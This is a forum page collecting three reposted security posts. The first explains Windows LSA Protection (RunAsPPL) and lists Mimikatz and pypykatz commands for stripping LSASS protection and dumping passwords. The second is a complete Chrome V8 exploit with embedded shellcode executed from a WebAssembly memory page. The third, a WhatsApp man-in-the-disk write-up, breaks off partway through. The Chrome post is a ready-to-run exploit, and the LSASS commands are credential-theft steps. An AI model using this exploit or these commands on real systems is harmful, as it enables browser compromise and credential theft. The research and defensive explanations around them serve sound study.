Everything posted by Nytro

  1. Do You Really Know About LSA Protection (RunAsPPL)?

April 07, 2021

When it comes to protecting against credential theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days.

Introduction

When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure, as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly effective. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected. Therefore, as a security consultant, this is one of the top recommendations I usually give to clients.

However, from a client's perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think this confusion comes from the fact that the latter seems to provide a more robust mechanism, although Credential Guard and LSA Protection are actually complementary. But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such an explanation, so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn't really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, which is why I wanted to write about it.
Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather to gather the information that I think is the most valuable from a security consultant's perspective.

How to Enable LSA Protection (RunAsPPL)

As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before. If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to:

  • open the Registry Editor (regedit.exe) as an Administrator;
  • open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa;
  • add the DWORD value RunAsPPL and set it to 1;
  • reboot.

That's it! You are done!

Before applying this setting throughout an entire corporate environment, though, there are two particular cases to consider. They are both described in the official documentation. If the answer to at least one of the two following questions is "yes", then you need to take some precautions.

  • Do you use any third-party authentication module?
  • Do you use UEFI and/or Secure Boot?

Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that it meets the requirements listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL).
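For reference, the registry procedure described above can also be captured in a .reg file and imported as Administrator before rebooting (a sketch based on the key and value names given above; the Group Policy route remains the recommended approach for corporate rollouts):

```reg
Windows Registry Editor Version 5.00

; Enable LSA Protection (RunAsPPL) - requires a reboot to take effect
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RunAsPPL"=dword:00000001
```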
The documentation also contains instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such a module would be blocked if RunAsPPL were enabled.

Secure Boot – If Secure Boot is enabled, which is usually the case with modern laptops for example, there is one important thing to be aware of. When RunAsPPL is enabled, the setting is stored in the firmware, in a UEFI variable. This means that, once the registry key is set and the machine has rebooted, deleting the newly added registry value will have no effect and RunAsPPL will remain enabled. If you want to disable the protection, you have to follow the procedure provided by Microsoft here: To disable LSA protection.

You Shall Not Pass!

By now, I assume you all know that RunAsPPL is an effective protection against tools such as Mimikatz (more about that in the next parts) or ProcDump from the Windows Sysinternals tools suite. An output such as the one below should therefore look familiar.

This screenshot shows several important things:

  • the current user is a member of the default Administrators group;
  • the current user has SeDebugPrivilege (although it is currently disabled);
  • the command privilege::debug in Mimikatz successfully enabled SeDebugPrivilege;
  • the command sekurlsa::logonpasswords failed with the error code 0x00000005.

So, despite all the privileges the current user has, the command failed. To understand why, we should take a look at the kuhl_m_sekurlsa_acquireLSA() function in mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c. Here is a simplified version of the code that shows only the part we are interested in.
HANDLE hData = NULL;
DWORD pid;
DWORD processRights = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION;

kull_m_process_getProcessIdForName(L"lsass.exe", &pid);
hData = OpenProcess(processRights, FALSE, pid);

if (hData && hData != INVALID_HANDLE_VALUE) {
    // if OpenProcess OK
} else {
    PRINT_ERROR_AUTO(L"Handle on memory");
}

In this code snippet, PRINT_ERROR_AUTO is a macro that basically prints the name of the function that failed, along with the error code. The error code itself is retrieved by invoking GetLastError(). For those of you who are not familiar with the way the Windows API works, you just have to know that SetLastError() and GetLastError() are two Win32 functions that allow you to set and get the last standard error code. The first 500 codes are listed here: System Error Codes (0-499).

Apart from that, the rest of the code is pretty straightforward. It first gets the PID of the process called lsass.exe and then tries to open it (i.e. get a process handle) with the flags PROCESS_VM_READ and PROCESS_QUERY_INFORMATION by invoking the Win32 function OpenProcess. What we can see in the previous screenshot is that this call failed with the error code 0x00000005, which simply means "Access is denied". This confirms that, once RunAsPPL is enabled, even an administrator with SeDebugPrivilege cannot open LSASS with the required access flags.

All the things I have explained so far can be considered common knowledge, as they have been discussed in many other blog posts and pentest cheat sheets before. But I had to do this recap to make sure we are all on the same page and also to introduce the following parts.

Bypassing RunAsPPL with Currently Known Techniques

At the time of writing this blog post, there are three main known techniques for bypassing RunAsPPL and accessing the memory of lsass.exe (or any other PPL in general). Once again, this has already been discussed in other blog posts, so I will try to keep this short.
Technique 1 – The Revenge of the Kiwi

In the previous part, I stated that RunAsPPL effectively prevents Mimikatz from accessing the memory of lsass.exe, but this tool is actually also the most commonly known technique for bypassing it. To do so, Mimikatz uses a digitally signed driver to remove the protection flag of the Process object in the Kernel. The file mimidrv.sys must be located in the current folder in order to be loaded as a Kernel driver service using the command !+. Then, you can use the command !processprotect to remove the protection and finally access lsass.exe.

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Once you are done, you can even "restore" the protection using the same command, but without the /remove argument, and finally unload the driver with !-.

mimikatz # !processprotect /process:lsass.exe
mimikatz # !-

There is one thing to be aware of if you do that, though! Mimikatz does not restore the protection to its original level. The two screenshots below show the protection level of the lsass.exe process before and after issuing the command !processprotect /process:lsass.exe. As you can see, when RunAsPPL is enabled, the protection level is PsProtectedSignerLsa-Light, whereas it is PsProtectedSignerWinTcb after the protection is restored by Mimikatz. In a way, this renders the system even more secure than it was, as you will see in the next part, but it could also have some undesired side effects.

Technique 2 – Bring Your Own Driver

The major drawback of the previous method is that it can be easily detected by an antivirus. Even if you are able to execute Mimikatz in memory, for example, you still have to copy mimidrv.sys onto the target. At this point, you could consider compiling a custom version of the driver to evade signature-based detection, but this would also break the digital signature of the file.
So, unless you are willing to pay a few hundred dollars to get your new driver signed, this will not do. If you don't want to go through the official signing process, there is a clever trick you can use. It consists in loading an official but vulnerable driver that can be exploited to run arbitrary code in the Kernel. Once the driver is loaded, it can be exploited from User-land to load an unsigned driver, for example. This technique is implemented in gdrv-loader and PPLKiller, for instance.

Technique 3 – Python & Katz

The previous two techniques both rely on the use of a driver to execute arbitrary code in the Kernel and disable the Process protection. Such techniques are still very dangerous: make one mistake and you trigger a BSOD.

More recently though, SkelSec presented an alternative method for accessing lsass.exe. In an article entitled Duping AV with handles, he presented a way to bypass AV detection/blocking of access to the LSASS process. If you want to access LSASS' memory, the first thing you have to do is invoke OpenProcess to get a handle with the appropriate rights on the Process object. Some AV software may therefore block such an attempt, effectively killing the attack in its early stage. The idea behind the technique described by SkelSec is simple: do not invoke OpenProcess at all. But how do you get the initial handle then? The answer comes from the following observation: sometimes other processes, such as AV software, already hold an open handle to the LSASS process in their memory space. So, as an administrator with debug privileges, you can copy this handle into your own process and then use it to access LSASS.

It turns out this technique serves another purpose. It can also be used to bypass RunAsPPL, because some unprotected processes may have obtained a handle on the LSASS process by other means, using a driver for instance. In that case, you can use pypykatz with the following command.
pypykatz live lsa --method handledup

On some occasions, this method worked perfectly fine for me, but it is still a bit random. The chance of success highly depends on the target environment, which explains why I was not able to reproduce it on my lab machine.

What are PPL Processes?

Here comes the interesting part. In the previous paragraphs, I intentionally glossed over some key concepts. I chose to present all the commonly known facts first, so I could explain them in more detail here.

A Long Time Ago in a Galaxy Far, Far Away…

OK, it was not that long ago and it was not that far away either. But still, the history behind PPLs is quite interesting and definitely worth mentioning.

First things first, PPL means Protected Process Light but, before that, there were just Protected Processes. The concept of Protected Process was introduced with Windows Vista / Server 2008, and its objective was not to protect your data or your credentials. Its initial objective was to protect media content and comply with DRM (Digital Rights Management) requirements. Microsoft developed this mechanism so that your media player could read a Blu-ray, for instance, while preventing you from copying its content. At the time, the requirement was that the image file (i.e. the executable file) had to be digitally signed with a special Windows Media Certificate (as explained in the "Protected Processes" part of Windows Internals).

In practice, a Protected Process can be accessed by an unprotected process only with very limited privileges: PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE and PROCESS_SUSPEND_RESUME. This set can even be reduced for some highly sensitive processes. A few years later, starting with Windows 8.1 / Server 2012 R2, Microsoft introduced the concept of Protected Process Light.
PPL is actually an extension of the previous Protected Process model and adds the concept of "protection level", which basically means that some PP(L) processes can be more protected than others.

Protection Levels

The protection level of a process was added to the EPROCESS kernel structure and is more specifically stored in its Protection member. This Protection member is a PS_PROTECTION structure and is documented here.

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1; // Reserved
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Although it is represented as a structure, all the information is stored in the two nibbles of a single byte (Level is a UCHAR, i.e. an unsigned char). The first 3 bits represent the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is a PP or a PPL. The last 4 bits represent the Signer type (see PS_PROTECTED_SIGNER below), i.e. the actual level of protection.

typedef enum _PS_PROTECTED_TYPE {
    PsProtectedTypeNone = 0,
    PsProtectedTypeProtectedLight = 1,
    PsProtectedTypeProtected = 2
} PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE;

typedef enum _PS_PROTECTED_SIGNER {
    PsProtectedSignerNone = 0,      // 0
    PsProtectedSignerAuthenticode,  // 1
    PsProtectedSignerCodeGen,       // 2
    PsProtectedSignerAntimalware,   // 3
    PsProtectedSignerLsa,           // 4
    PsProtectedSignerWindows,       // 5
    PsProtectedSignerWinTcb,        // 6
    PsProtectedSignerWinSystem,     // 7
    PsProtectedSignerApp,           // 8
    PsProtectedSignerMax            // 9
} PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER;

As you probably guessed, a process' protection level is defined by a combination of these two values. The table below lists the most common combinations.
Protection level                  Value   Signer            Type
PS_PROTECTED_SYSTEM               0x72    WinSystem (7)     Protected (2)
PS_PROTECTED_WINTCB               0x62    WinTcb (6)        Protected (2)
PS_PROTECTED_WINDOWS              0x52    Windows (5)       Protected (2)
PS_PROTECTED_AUTHENTICODE         0x12    Authenticode (1)  Protected (2)
PS_PROTECTED_WINTCB_LIGHT         0x61    WinTcb (6)        Protected Light (1)
PS_PROTECTED_WINDOWS_LIGHT        0x51    Windows (5)       Protected Light (1)
PS_PROTECTED_LSA_LIGHT            0x41    Lsa (4)           Protected Light (1)
PS_PROTECTED_ANTIMALWARE_LIGHT    0x31    Antimalware (3)   Protected Light (1)
PS_PROTECTED_AUTHENTICODE_LIGHT   0x11    Authenticode (1)  Protected Light (1)

Signer Types

In the early days of Protected Processes, the protection level was binary: either a process was protected or it was not. We saw that this changed when PPLs were introduced with Windows NT 6.3. Both PP and PPL now have a protection level which is determined by a signer level, as described previously. Therefore, another interesting thing to know is how the signer type, and thus the protection level, is determined.

The answer to this question is quite simple. Although there are some exceptions, the signer level is most commonly determined by a special field in the file's digital certificate: Enhanced Key Usage (EKU). On this screenshot, you can see two examples: wininit.exe on the left and SgrmBroker.exe on the right. In both cases, we can see that the EKU field contains the OID that represents the Windows TCB Component signer type. The second highlighted OID represents the protection level, which is Protected Process Light in the case of wininit.exe and Protected Process in the case of SgrmBroker.exe. As a result, we know that the latter can be executed as a PP whereas the former can only be executed as a PPL. However, they will both have the WinTcb level.

Protection Precedence

The last key aspect that needs to be discussed is Protection Precedence.
In the “Protected Process Light (PPL)” part of Windows Internals 7th Edition Part 1, you can read the following:

    When interpreting the power of a process, keep in mind that first, protected processes always trump PPLs, and that next, higher-value signer processes have access to lower ones, but not vice versa.

In other words:

  • a PP can open a PP or a PPL with full access, as long as its signer level is greater than or equal;
  • a PPL can open another PPL with full access, as long as its signer level is greater than or equal;
  • a PPL cannot open a PP with full access, regardless of its signer level.

Note: it goes without saying that the ACL checks still apply. Being a Protected Process does not grant you superpowers. If you are running a protected process as a low-privileged user, you will not be able to magically access other users' processes. It is an additional protection.

To illustrate this, I picked three easily identifiable processes / image files:

  • wininit.exe – Session 0 initialization
  • lsass.exe – LSASS process
  • MsMpEng.exe – Windows Defender service

Pr.  Process      Type             Signer       Level
1    wininit.exe  Protected Light  WinTcb       PsProtectedSignerWinTcb-Light
2    lsass.exe    Protected Light  Lsa          PsProtectedSignerLsa-Light
3    MsMpEng.exe  Protected Light  Antimalware  PsProtectedSignerAntimalware-Light

These three PPLs are running as NT AUTHORITY\SYSTEM with SeDebugPrivilege, so user rights are not a concern in this example. It all comes down to the protection level. As wininit.exe has the signer type WinTcb, which is the highest possible value for a PPL, it could access the two other processes. Then, lsass.exe could access MsMpEng.exe, as the signer level Lsa is higher than Antimalware. Finally, MsMpEng.exe can access neither of the two other processes because it has the lowest level.

Conclusion

In the end, the concept of Protected Process (Light) remains a Userland protection. It was designed to prevent normal applications, even with administrator privileges, from accessing protected processes.
This explains why most common techniques for bypassing such protection require the use of a driver. If you are able to execute arbitrary code in the Kernel, you can do (almost) whatever you want, including completely disabling the protection of any Protected Process. Of course, this has become a bit more complicated over the years, as you are now required to load a digitally signed driver, but as we saw, this restriction can be worked around.

In this post, we also saw that this concept has evolved from a basic unprotected/protected model to a hierarchical model, in which some processes can be more protected than others. In particular, we saw that LSASS has its own protection level – PsProtectedSignerLsa-Light. This means that a process with a higher protection level (e.g. WININIT) would still be able to open it with full access.

There is one aspect of PP/PPL that I did not mention though. The "L" in "PPL" is there for a reason. With the concept of Protected Process Light, the overall security model was partially loosened, which opens some doors for Userland exploits. In the coming days, I will release the second part of this post to discuss one of these techniques. This will also be accompanied by the release of a new tool – PPLdump. As its name implies, this tool provides the ability for a local administrator to dump the memory of any PPL process, using only Userland tricks.

Lastly, I would like to mention that this Research & Development work was partly done in the context of my job at SCRT. So, the next part will be published on their blog, but I'll keep you posted on Twitter. The best is yet to come, so stay tuned!
Links & Resources

  • Microsoft – How to configure additional LSA protection of credentials
    https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
  • Windows Internals 7th edition (Part 1)
    https://docs.microsoft.com/en-us/sysinternals/resources/windows-internals

Source: https://itm4n.github.io/lsass-runasppl/
  2. Chrome 0day

/*
BSD 2-Clause License

Copyright (c) 2021, rajvardhan agarwal
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
    var x = 1;
    x = (_arr[0] ^ 0) + 1;
    x = Math.abs(x);
    x -= 2147483647;
    x = Math.max(x, 0);
    x -= 1;
    if (x == -1) x = 0;
    var arr = new Array(x);
    arr.shift();
    var cor = [1.1, 1.2, 1.3];
    return [arr, cor];
}

for (var i = 0; i < 0x3000; ++i) foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
    if (addr % 2n == 0) { addr += 1n; }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}

function arbwrite(addr, val) {
    if (addr % 2n == 0) { addr += 1n; }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));

var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];

copy_shellcode(rwx_page_addr, shellcode);
f();

Source: https://github.com/r4j0x00/exploits/tree/master/chrome-0day
  3. Remote exploitation of a man-in-the-disk vulnerability in WhatsApp (CVE-2021-24027)

CENSUS has been investigating for some time now the exploitation potential of Man-in-the-Disk (MitD) [01] vulnerabilities in Android. Recently, CENSUS identified two such vulnerabilities in the popular WhatsApp messenger app for Android [34]. The first of these was possibly independently reported to Facebook and was found to be patched in recent versions, while the second one was communicated by CENSUS to Facebook and was tracked as CVE-2021-24027 [33]. As both vulnerabilities have now been patched, we would like to share our discoveries regarding the exploitation potential of such vulnerabilities with the rest of the community.

In this article we will have a look at how a simple phishing attack through an Android messaging application could result in the direct leakage of data found in External Storage (/sdcard). Then we will show how the two aforementioned WhatsApp vulnerabilities would have made it possible for attackers to remotely collect TLS cryptographic material for TLS 1.3 and TLS 1.2 sessions. With the TLS secrets at hand, we will demonstrate how a man-in-the-middle (MitM) attack can lead to the compromise of WhatsApp communications, to remote code execution on the victim device and to the extraction of Noise [05] protocol keys used for end-to-end encryption in user communications.

Android 10 introduced the scoped storage feature [13] as a proactive defense against these types of attacks. With scoped storage, apps by default get access only to their own content on External Storage. Apps bearing a certain permission [36] can also access content shared by other applications. Finally, full access to External Storage is only granted to special-purpose apps (e.g. file managers) that have been audited by Google.
Android 11 is the first version to fully enforce the scoped storage rules on all apps, while Android 10 included a permissive mode of operation to provide developers with the time needed to transition to the new file access scheme. The techniques presented in this article apply to mobile devices running Android versions up to and including Android 9. It is possible to perform similar attacks using file-based access in Android 10, but we have not included these for reasons of brevity. Even without Android 10 in the picture, the number of affected devices remains quite large. Appbrain statistics [35] hint that devices running Android up to and including version 9 may very well constitute 60% of all devices running Android today.

In the past, state-sponsored actors have used messaging applications to infiltrate activist groups [06] or even to attack individuals [07], so seemingly innocent interactions in such applications may indeed be part of targeted phishing attacks. More importantly, vulnerabilities that enable adversaries to perform man-in-the-middle attacks can be abused for mass surveillance purposes. CENSUS has no knowledge of whether the attacks described in this article have indeed been used in the wild. WhatsApp users are strongly recommended to upgrade to version 2.21.4.18 or later. Keeping system components updated, such as the Chrome browser and the Android Operating System, is also key to establishing a proactive defense against man-in-the-disk vulnerabilities.

Note: All WhatsApp code snippets presented in this text correspond to decompiled Java code recovered from an older version of WhatsApp (2.19.355) using jadx [08]. Most classes and variables have been renamed to reflect their semantics. Original minified class names are also provided where possible.
Here are some quick links to help you navigate through this blog post:

  • The Android Media Store Content Provider
  • The Chrome CVE-2020-6516 Same-Origin-Policy bypass
  • Session Resumption and Pre-Shared Keys in TLS 1.3
  • Session Resumption and the Master Secret in TLS 1.2
  • The WhatsApp TLS Man-in-the-disk Vulnerabilities
  • From TLS secrets collection to Remote Code Execution
  • Stealing the victim's Noise protocol key pair
  • Conclusion and Future Work

The Android Media Store Content Provider

When a user clicks on a picture message, WhatsApp needs to call an external application to view the file. However, the external application might not have access to WhatsApp's internal storage. Indeed, one cannot make any assumptions about the whereabouts of this picture file on the filesystem or its permissions. So, in the picture case, there must be a way for the photo viewer to locate, read and display media files belonging to WhatsApp.

Enter the concept of Content Providers [09], an IPC mechanism by which one application (e.g. WhatsApp) can share resources with any other application (e.g. Google Photos). Content providers are an interesting technology and a powerful tool in the hands of Android developers. There are plenty of content providers on an Android system; some are exported by third-party applications, others by the Android framework itself. For example, a modern Android device comes with content providers that expose SMS and MMS information, telephony logs, browser bookmarks, downloaded files and so on. Of course, content providers also come with a means of controlling access to their resources (e.g. see exported, permission and grantUriPermissions [10]). Despite various pitfalls and past CVE-less issues [11], these security controls generally work well. However, there are certain content providers which can be freely accessed by any application, by design. The Media Store is one such example. It exports a content provider which indexes and manages all files under /sdcard.
Using the Media Store, applications can read and write files in external storage without relying on absolute filesystem paths. The Android developer documentation emphasizes that the content provider of the Media Store is the preferred way of accessing external storage files in application code.

To experiment with content providers, one can use the content command on Android devices. Root access is not necessarily required. For example, to see the list of files managed by the Media Store, one can execute the following command:

$ content query --uri content://media/external/file

To make the output more human-friendly, one can limit the displayed columns to the identifier and path of each indexed file:

$ content query --uri content://media/external/file --projection _id,_data

Media providers exist in their own private namespace. As illustrated in the example above, to access a content provider the corresponding content:// URI should be specified. Generally, information on the paths via which a provider can be accessed can be recovered by looking at application manifests (in case the content provider is exported by an application) or the source code of the Android framework.

Interestingly, on Android devices Chrome supports accessing content providers via the content:// scheme. This feature allows the browser to access resources (e.g. photos, documents etc.) exported by third-party applications. To verify this, one can insert a custom entry in the Media Store and then access it using the browser:

$ cd /sdcard
$ echo "Hello, world!" > test.txt
$ content insert --uri content://media/external/file \
    --bind _data:s:/storage/emulated/0/test.txt \
    --bind mime_type:s:text/plain

To discover the identifier of the newly inserted file:

$ content query --uri content://media/external/file \
    --projection _id,_data | grep test.txt
Row: 283 _id=747, _data=/storage/emulated/0/test.txt

And to actually view the file in Chrome, one can use a URL like the one shown in the following picture. Notice the file identifier 747 (discovered above), which is used as a suffix in the URL.

As this article focuses on WhatsApp, it would be interesting to see the list of related files indexed by the Media Store. The following output was collected from a Pixel 3a device after using WhatsApp for a few days.

$ content query --uri content://media/external/file --projection _id,_data | grep -i whatsapp
...
Row: 82 _id=58, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache
Row: 83 _id=705, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/157.240.9.53.443
Row: 84 _id=239, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/crashlogs.whatsapp.net.443
Row: 85 _id=240, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/pps.whatsapp.net.443
Row: 86 _id=90, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/static.whatsapp.net.443
Row: 87 _id=706, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/v.whatsapp.net.443
Row: 88 _id=89, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/SSLSessionCache/www.whatsapp.com.443
...
Row: 90 _id=57, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions
Row: 91 _id=704, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bW1nLndoYXRzYXBwLm5ldCM0NDMjVExTX0FFU18xMjhfR0NNX1NIQTI1Ng==
Row: 92 _id=743, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEtYW10Mi0xLmNkbi53aGF0c2FwcC5uZXQjNDQzI1RMU19BRVNfMTI4X0dDTV9TSEEyNTY=
Row: 93 _id=744, _data=/storage/emulated/0/Android/data/com.whatsapp/cache/watls-sessions/bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2
...
Row: 291 _id=206, _data=/storage/emulated/0/WhatsApp/Backups
Row: 292 _id=252, _data=/storage/emulated/0/WhatsApp/Backups/chatsettingsbackup.db.crypt1
Row: 293 _id=253, _data=/storage/emulated/0/WhatsApp/Backups/statusranking.db.crypt1
Row: 294 _id=251, _data=/storage/emulated/0/WhatsApp/Backups/stickers.db.crypt1
Row: 295 _id=204, _data=/storage/emulated/0/WhatsApp/Databases
Row: 296 _id=708, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-07.1.db.crypt12
Row: 297 _id=709, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-08.1.db.crypt12
Row: 298 _id=746, _data=/storage/emulated/0/WhatsApp/Databases/msgstore-2020-10-09.1.db.crypt12
Row: 299 _id=243, _data=/storage/emulated/0/WhatsApp/Databases/msgstore.db.crypt12
...
Row: 319 _id=528, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images
Row: 320 _id=721, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0013.jpeg
Row: 321 _id=722, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0015.jpeg
Row: 322 _id=724, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0018.jpeg
Row: 323 _id=733, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0029.jpeg
Row: 324 _id=734, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0032.jpeg
Row: 325 _id=735, _data=/storage/emulated/0/WhatsApp/Media/WhatsApp Images/IMG-20201009-WA0035.jpeg
...

Apart from the last few lines, where paths to various image files are shown, there are plenty of interesting entries in the above listing: Backups, databases, and the more suspicious-looking SSLSessionCache and watls-sessions. For the uninitiated, /storage/emulated/0 is a synonym for /sdcard, i.e. the external storage path. Apps bearing the READ_EXTERNAL_STORAGE permission may obtain access to any file stored in external storage on Android 9 and previous Android versions. It is also essential to note that file identifiers like 323, 324 and 325 shown above are just sequential integers, which can be guessed or even brute-forced. On a typical Android device, these identifiers usually fall within the range of tens of thousands.

The Chrome CVE-2020-6516 Same-Origin-Policy bypass

The Same Origin Policy (SOP) [12] in browsers dictates that Javascript content of URL A will only be able to access content at URL B if the following URL attributes remain the same for A and B:

- The protocol, e.g. https vs. http
- The domain, e.g. www.example1.com vs. www.example2.com
- The port, e.g. www.example1.com:8080 vs. www.example1.com:8443

Of course, there are exceptions to the above rules, but in general, a resource from https://www.example1.com (e.g.
a piece of Javascript code) cannot access the DOM of a resource on https://www.example2.com, as this would introduce serious information leaks. Unless a Cross-Origin-Resource-Sharing (CORS) policy explicitly allows it, it shouldn't be possible for a web resource to bypass the SOP rules.

It's essential to note that Chrome considers content:// to be a local scheme, just like file://. In this case SOP rules are even stricter, as each local scheme URL is considered a separate origin. For example, Javascript code in file:///tmp/test.html should not be able to access the contents of file:///tmp/test2.html, or any other file on the filesystem for that matter. Consequently, according to SOP rules, a resource loaded via content:// should not be able to access any other content:// resource. Well, vulnerability CVE-2020-6516 of Chrome created an "exception" to this rule.

CVE-2020-6516 [03] is a SOP bypass on resources loaded via a content:// URL. For example, Javascript code, running from within the context of an HTML document loaded from content://com.example.provider/test.html, can load and access any other resource loaded via a content:// URL. This is a serious vulnerability, especially on devices running Android 9 or previous versions of Android. On these devices scoped storage [13] is not implemented and, consequently, application-specific data under /sdcard, and more interestingly under /sdcard/Android, can be accessed via the system's Media Store content provider.

